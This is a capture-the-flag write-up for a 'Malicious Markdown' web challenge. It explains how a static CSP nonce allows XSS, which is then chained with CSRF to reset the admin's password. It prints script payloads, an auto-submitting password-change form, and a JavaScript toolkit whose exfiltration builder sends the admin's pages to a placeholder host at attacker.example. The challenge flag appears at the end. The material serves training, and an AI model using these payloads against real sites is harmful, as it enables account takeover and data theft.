
Malicious

2023-11-01
Markdown 300 pts
Description
Use my markdown editor to share notes with each other. You can write most HTML but I disabled
Javascript in notes because it's dangerous.
Solution
This challenge is an "XSS/CSRF the admin" type challenge with some additional mitigations in the way.
First, by navigating the app, we learn that we can create notes and share them with other users. We
also have the ability to create accounts and change our own password.
We have to make two observations to understand the steps of the exploit:
The password change form is vulnerable to CSRF.
The note viewer is vulnerable to XSS because the Content Security Policy in use is insecure: it relies on a
static nonce, i.e. the same nonce value is served on every response instead of a fresh random one.
First we need to achieve XSS. This can be done by identifying the nonce that the CSP policy uses. It is
set by the response header as follows:
Content-Security-Policy: script-src 'nonce-2726c7f26c'

Since that nonce never changes, we can execute JavaScript by giving our own script tags the nonce 2726c7f26c. For example:

<script nonce="2726c7f26c">
alert()
</script>

By creating a note with this payload we can confirm that we are able to run JavaScript. If we share this
note with the admin user, they will be hit with our payload when they view it.
Copyright © 2023 CTFd LLC
With XSS we could finish the challenge by reading various parts of the site as the admin and exfiltrating
them to a server we control. However, there is an easier route, because we know that the password change
form is vulnerable to CSRF.
We can use our XSS payload to force the admin's browser to change their password to a value that we
know, using the following payload:

<!-- CSRF part: the password-change form, pre-filled with a password we choose -->
<form method="POST" action="/profile" name="exploit">
<input type="text" name="password" value="hacked">
</form>
<!-- XSS part: the static nonce lets this inline script run under the CSP and submit the form as the admin -->
<script nonce="2726c7f26c">
document.forms.exploit.submit()
</script>

Note: you may need to use curl or fetch to share the note with the admin manually, because opening the
note page to press the share button will execute the payload in your own browser and redirect you to profile.
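The three steps above (spot the nonce in the CSP header, confirm it is static rather than per-response, and wrap the CSRF form in a script carrying that nonce) can be scripted. The following is an added example written for this writeup, not code from the challenge or from the original author; the CSP header value, the /profile action and the password field name are taken from the writeup, while the set of "captured" headers and the collector URL are constructed placeholders.

```javascript
// Added example: tooling for the static-nonce CSP bypass described in the writeup.
// Assumptions (not from the challenge): the captured header sets below are constructed
// sample data, and COLLECTOR_URL is a placeholder for a server the attacker controls.

// Extract every 'nonce-...' value from the directive that governs <script> elements.
// script-src wins; if it is absent, default-src applies to scripts as well.
function scriptSrcNonces(cspHeader) {
  const directives = cspHeader.split(';').map(d => d.trim()).filter(Boolean);
  const governing =
    directives.find(d => /^script-src(\s|$)/i.test(d)) ||
    directives.find(d => /^default-src(\s|$)/i.test(d)) || '';
  const nonces = [];
  for (const token of governing.split(/\s+/).slice(1)) {
    const m = /^'nonce-([A-Za-z0-9+\/=_-]+)'$/.exec(token);
    if (m) nonces.push(m[1]);
  }
  return nonces;
}

// A correct deployment issues a fresh, unguessable nonce on every response. If the same
// nonce appears in several independent responses, anyone who has seen one response can
// satisfy the CSP, which is equivalent to 'unsafe-inline' for script-src.
// Returns false when the evidence is inconclusive (fewer than two responses, or a
// response with zero or several nonces).
function nonceIsStatic(cspHeaders) {
  if (cspHeaders.length < 2) return false;
  const seen = new Set();
  for (const h of cspHeaders) {
    const n = scriptSrcNonces(h);
    if (n.length !== 1) return false;
    seen.add(n[0]);
  }
  return seen.size === 1;
}

// Minimal attribute escaping so an attacker-chosen password cannot break the value="" quoting.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;').replace(/"/g, '&quot;')
    .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Note body for the CSRF route: the password-change form plus an auto-submit script that
// carries the leaked nonce. The input is hidden so the victim sees nothing before the redirect.
function buildCsrfNote(nonce, newPassword, action = '/profile') {
  return [
    `<form method="POST" action="${action}" name="exploit">`,
    `<input type="hidden" name="password" value="${escapeAttr(newPassword)}">`,
    `</form>`,
    `<script nonce="${nonce}">document.forms.exploit.submit()</script>`,
  ].join('\n');
}

// Note body for the alternative the writeup mentions: fetch a page as the admin and post
// its contents to a collector. Same-origin fetch sends the session cookie automatically.
function buildExfilNote(nonce, targetPath, collectorUrl) {
  const js =
    `fetch(${JSON.stringify(targetPath)}, {credentials: 'include'})` +
    `.then(r => r.text())` +
    `.then(t => fetch(${JSON.stringify(collectorUrl)}, {method: 'POST', mode: 'no-cors', body: t}))`;
  return `<script nonce="${nonce}">${js}</script>`;
}

// Constructed sample data: three responses from the challenge app (static nonce) versus
// two responses from a correctly configured app (nonce rotates per response).
const capturedCspHeaders = [
  "script-src 'nonce-2726c7f26c'",
  "script-src 'nonce-2726c7f26c'",
  "script-src 'nonce-2726c7f26c'",
];
const rotatingCspHeaders = [
  "default-src 'self'; script-src 'nonce-a1b2c3d4e5' 'strict-dynamic'",
  "default-src 'self'; script-src 'nonce-f6a7b8c9d0' 'strict-dynamic'",
];
const COLLECTOR_URL = 'https://attacker.example/collect'; // placeholder, not from the challenge

if (nonceIsStatic(capturedCspHeaders)) {
  const nonce = scriptSrcNonces(capturedCspHeaders[0])[0];
  console.log(buildCsrfNote(nonce, 'hacked'));
  console.log(buildExfilNote(nonce, '/profile', COLLECTOR_URL));
}
```

The check in nonceIsStatic is the one worth keeping in a tester's toolkit: request the same page two or three times (ideally from different sessions) and diff the script-src nonces. A nonce that repeats is as good as no nonce, and the browser will happily run any inline script whose nonce attribute matches it exactly.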
Once the admin has viewed the note, we know their username and their new password, and we can log in as them.

Flags
flag{look_at_me_im_the_admin_now}



